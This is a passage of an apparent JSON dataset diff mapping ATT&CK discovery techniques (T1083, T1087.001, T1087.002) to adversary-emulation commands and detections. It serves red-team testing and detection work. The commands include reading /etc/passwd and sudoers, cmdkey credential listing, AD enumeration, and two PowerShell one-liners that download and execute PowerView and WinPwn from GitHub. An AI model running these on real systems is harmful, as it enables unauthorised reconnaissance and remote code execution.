-name #{host.print.file} 2>/dev/null", + "source": "data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml", + "name": "Locate file that appears in the printer queue" + }, + { + "command": "powershell/collection/file_finder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/find_interesting_file", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/get_indexed_item", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_fileserver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1083", + "display_name": "File and Directory Discovery", + "atomic_tests": [ + { + "name": "File and Directory Discovery (cmd.exe)", + "auto_generated_guid": "0e36303b-6762-4500-b003-127743b80ba6", + "description": "Find or discover files on the file system. Upon execution, the file \"download\" will be placed in the temporary folder and contain the output of\nall of the data discovery commands.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "name": "command_prompt" + } + }, + { + "name": "File and Directory Discovery (PowerShell)", + "auto_generated_guid": "2158908e-b7ef-4c21-8a83-3ce4dd05a924", + "description": "Find or discover files on the file system. Upon execution, file and folder information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "name": "powershell" + } + }, + { + "name": "Nix File and Directory Discovery", + "auto_generated_guid": "ffc8b249-372a-4b74-adcd-e4c0430842de", + "description": "Find or discover files on the file system\n\nReferences:\n\nhttp://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/\n\nhttps://perishablepress.com/list-files-folders-recursively-terminal/\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1083.txt" + } + }, + "executor": { + "command": "ls -a >> #{output_file}\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;\nfile */* *>> #{output_file}\ncat #{output_file} 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Nix File and Directory Discovery 2", + "auto_generated_guid": "13c5e1ae-605b-46c4-a79f-db28c77ff24e", + "description": "Find or discover files on the file system\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1083.txt" + } + }, + "executor": { + "command": "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}\nif [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;\nfind . -type f -iname *.pdf >> #{output_file}\ncat #{output_file}\nfind . -type f -name \".*\"\n", + "cleanup_command": "rm #{output_file}", + "name": "sh" + } + }, + { + "name": "Simulating MAZE Directory Enumeration", + "auto_generated_guid": "c6c34f61-1c3e-40fb-8a58-d017d88286d8", + "description": "This test emulates MAZE ransomware's ability to enumerate directories using Powershell. \nUpon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. \nSee https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "File_to_output": { + "description": "File to output results to", + "type": "String", + "default": "$env:temp\\T1083Test5.txt" + } + }, + "executor": { + "command": "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append #{File_to_output}\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n", + "cleanup_command": "remove-item #{File_to_output} -ErrorAction SilentlyContinue\n", + "name": "powershell" + } + } + ] + }, + { + "id": "1c353eb4-29ab-4dfe-88ed-f34f5a60848e", + "name": "File and Directory Discovery", + "description": "Find or discover files on the file system", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-ChildItem -Path #{host.system.path}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.system.path" + } + ] + } + ] + }, + { + "id": "52177cc1-b9ab-4411-ac21-2eadc4b5d3b8", + "name": "List Directory", + "description": "List contents of current directory", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ls\n" + } + }, + "linux": { + "sh": { + "command": "ls\n" + } + }, + "windows": { + "psh": { + "command": "dir\n" + } + } + } + }, + { + "id": "6e1a53c0-7352-4899-be35-fa7f364d5722", + "name": "Print Working Directory", + "description": "Print the current working directory on the system", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "pwd\n" + } + }, + "linux": { + "sh": { + "command": "pwd\n" + } + }, + "windows": { + "psh": { + "command": "pwd\n" + } + } + } + }, + { + "id": "a41c2324-8c63-4b15-b3c5-84f920d1f226", + "name": "Locate file from printer queue", + "description": "Locate file that appears in the printer queue", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "find ~ -type f -name #{host.print.file} 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.system.path" + } + ] + } + } + }, + "darwin": { + "sh": { + "command": "find ~ -type f -name #{host.print.file} 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.system.path" + } + ] + } + } + } + } + }, + { + "Empire Module": "powershell/collection/file_finder", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/file_finder\": [\"T1083\"]," + }, + { + "Empire Module": "powershell/collection/find_interesting_file", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/find_interesting_file\": [\"T1083\"]," + }, + { + "Empire Module": "powershell/collection/get_indexed_item", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/get_indexed_item\": [\"T1083\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_fileserver", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "T1135", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_fileserver\": [\"T1083\",\"T1135\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1087.001", + "command_list": [ + "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "username=$(id -u -n) && lsof -u $username\n", + "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "groups\nid\n", + "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "query user\n", + "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "dscl . list /Users | grep -v '_'\n", + "Get-WmiObject -Class Win32_UserAccount\n" + ], + "commands": [ + { + "command": "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "username=$(id -u -n) && lsof -u $username\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "groups\nid\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "query user\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "source": "data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml", + "name": "Get a list of all local users" + }, + { + "command": "dscl . list /Users | grep -v '_'\n", + "source": "data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml", + "name": "Identify all local users" + }, + { + "command": "Get-WmiObject -Class Win32_UserAccount\n", + "source": "data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml", + "name": "Identify all local users" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1087.001", + "display_name": "Account Discovery: Local Account", + "atomic_tests": [ + { + "name": "Enumerate all accounts (Local)", + "auto_generated_guid": "f8aab3dd-5990-4bf8-b8ab-2226c951696f", + "description": "Enumerate all accounts by copying /etc/passwd to another file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "cat /etc/passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "View sudoers access", + "auto_generated_guid": "fed9be70-0186-4bde-9f8a-20945f9370c2", + "description": "(requires root)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "sudo cat /etc/sudoers > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "View accounts with UID 0", + "auto_generated_guid": "c955a599-3653-4fe5-b631-f11c00eb0397", + "description": "View accounts with UID 0\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "grep 'x:0:' /etc/passwd > #{output_file}\ncat #{output_file} 2>/dev/null\n", + "cleanup_command": "rm -f #{output_file} 2>/dev/null\n", + "name": "sh" + } + }, + { + "name": "List opened files by user", + "auto_generated_guid": "7e46c7a5-0142-45be-a858-1a3ecb4fd3cb", + "description": "List opened files by user\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "username=$(id -u -n) && lsof -u $username\n", + "name": "sh" + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "check if lsof exists\n", + "prereq_command": "which lsof\n", + "get_prereq_command": "(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n" + } + ] + }, + { + "name": "Show if a user account has ever logged in remotely", + "auto_generated_guid": "0f0b6a29-08c3-44ad-a30b-47fd996b2110", + "description": "Show if a user account has ever logged in remotely\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if lastlog command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v lastlog)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo apt-get install login; exit 1;\n" + } + ], + "executor": { + "command": "lastlog > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Enumerate users and groups", + "auto_generated_guid": "e6f36545-dc1e-47f0-9f48-7f730f54a02e", + "description": "Utilize groups and id to enumerate users and groups\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "groups\nid\n", + "name": "sh" + } + }, + { + "name": "Enumerate users and groups", + "auto_generated_guid": "319e9f6c-7a9e-432e-8c62-9385c803b6f2", + "description": "Utilize local utilities to enumerate users and groups\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "name": "sh" + } + }, + { + "name": "Enumerate all accounts on Windows (Local)", + "auto_generated_guid": "80887bec-5a9b-4efc-a81d-f83eb2eb32ab", + "description": "Enumerate all accounts\nUpon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate all accounts via PowerShell (Local)", + "auto_generated_guid": "ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b", + "description": "Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "name": "powershell" + } + }, + { + "name": "Enumerate logged on users via CMD (Local)", + "auto_generated_guid": "a138085e-bfe5-46ba-a242-74a6fb884af3", + "description": "Enumerate logged on users. Upon execution, logged on users will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "query user\n", + "name": "command_prompt" + } + } + ] + }, + { + "id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48", + "name": "Find local users", + "description": "Get a list of all local users", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.001", + "name": "Account Discovery: Local Account" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.user.name" + } + ] + } + } + } + } + }, + { + "id": "feaced8f-f43f-452a-9500-a5219488abb8", + "name": "Identify local users", + "description": "Identify all local users", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.001", + "name": "Account Discovery: Local Account" + }, + "platforms": { + "darwin": { + "sh": { + "command": "dscl . list /Users | grep -v '_'\n" + } + }, + "windows": { + "psh": { + "command": "Get-WmiObject -Class Win32_UserAccount\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1087.002", + "command_list": [ + "net user /domain\nnet group /domain\n", + "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "query user /SERVER:$env:COMPUTERNAME\n", + "Invoke-Expression $env:TEMP\\ADRecon.ps1\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc admincountdmp\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=person)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc exchaddresses\n", + "net user administrator /domain\n", + "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server $env:UserDnsDomain\n", + null, + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n", + "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "net user #{domain.user.name} /domain", + "net user /domain" + ], + "commands": [ + { + "command": "net user /domain\nnet group /domain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "query user /SERVER:$env:COMPUTERNAME\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "Invoke-Expression $env:TEMP\\ADRecon.ps1\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc 